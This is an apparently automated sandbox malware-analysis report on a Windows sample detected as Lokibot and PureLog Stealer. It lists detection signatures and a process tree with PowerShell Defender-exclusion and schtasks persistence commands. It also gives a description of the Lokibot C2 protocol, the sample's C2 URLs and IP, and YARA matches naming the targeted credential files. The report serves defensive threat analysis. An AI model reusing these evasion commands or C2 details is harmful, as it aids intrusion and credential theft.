Edit tour

Windows Analysis Report
Scan copy.exe

Overview

General Information

Sample name:	Scan copy.exe
Analysis ID:	1564386
MD5:	8c4da707092623f03586e61f56755840
SHA1:	69be0cb3d2d2a7930c675449636d988f22d5f1e7
SHA256:	43e710d54cc34ae668a10b0ce9e89fd4f7d147cef34c7d44275ec96be9cfb901
Tags:	exeuser-julianmckein
Infos:

Detection

Lokibot, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Scan copy.exe (PID: 5420 cmdline: "C:\Users\user\Desktop\Scan copy.exe" MD5: 8C4DA707092623F03586E61F56755840)

powershell.exe (PID: 6648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7552 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7172 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Scan copy.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\Scan copy.exe" MD5: 8C4DA707092623F03586E61F56755840)

vLQwEscoQr.exe (PID: 7512 cmdline: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe MD5: 8C4DA707092623F03586E61F56755840)

schtasks.exe (PID: 7992 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vLQwEscoQr.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe" MD5: 8C4DA707092623F03586E61F56755840)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17cc8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5093:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x138d7:$des3: 68 03 66 00 00 0x17cc8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17d94:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000A.00000002.2502216653.0000000000D76000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1295403096.00000000051B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4b7c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x77cf8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x650ab:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x738ef:$des3: 68 03 66 00 00 0x77cf8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x77dc4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17708:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4ad3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13317:$des3: 68 03 66 00 00 0x17708:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x177d4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x7c3f8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x697c3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x78007:$des3: 68 03 66 00 00 0x7c3f8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x7c4c4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x8a83f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
Process Memory Space: Scan copy.exe PID: 5420	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Scan copy.exe PID: 5420	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Scan copy.exe PID: 5420	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Scan copy.exe PID: 5420	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x322d1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x48afe:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Scan copy.exe PID: 7380	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: vLQwEscoQr.exe PID: 7512	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: vLQwEscoQr.exe PID: 7512	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: vLQwEscoQr.exe PID: 7512	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vLQwEscoQr.exe PID: 7512	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2373:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x2a731:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: vLQwEscoQr.exe PID: 8048	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: vLQwEscoQr.exe PID: 8048	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: vLQwEscoQr.exe PID: 8048	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1db0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 46 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Scan copy.exe.51b0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Scan copy.exe.51b0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.vLQwEscoQr.exe.41ec8d8.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
13.2.vLQwEscoQr.exe.41ec8d8.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
13.2.vLQwEscoQr.exe.41ec8d8.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
13.2.vLQwEscoQr.exe.41ec8d8.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
13.2.vLQwEscoQr.exe.41ec8d8.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Scan copy.exe.38ea318.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Scan copy.exe.38ea318.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Scan copy.exe.38ea318.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Scan copy.exe.38ea318.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Scan copy.exe.38ea318.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Scan copy.exe.38ea318.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Scan copy.exe.38ea318.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Scan copy.exe.38ea318.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Scan copy.exe.3787008.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Scan copy.exe.3787008.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Scan copy.exe.3787008.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Scan copy.exe.3787008.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Scan copy.exe.3787008.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Scan copy.exe.3787008.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Scan copy.exe.3787008.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Scan copy.exe.3787008.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Scan copy.exe.38ea318.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Scan copy.exe.38ea318.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Scan copy.exe.38ea318.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Scan copy.exe.38ea318.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Scan copy.exe.38ea318.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
20.2.vLQwEscoQr.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
20.2.vLQwEscoQr.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
20.2.vLQwEscoQr.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.vLQwEscoQr.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
20.2.vLQwEscoQr.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
20.2.vLQwEscoQr.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
20.2.vLQwEscoQr.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
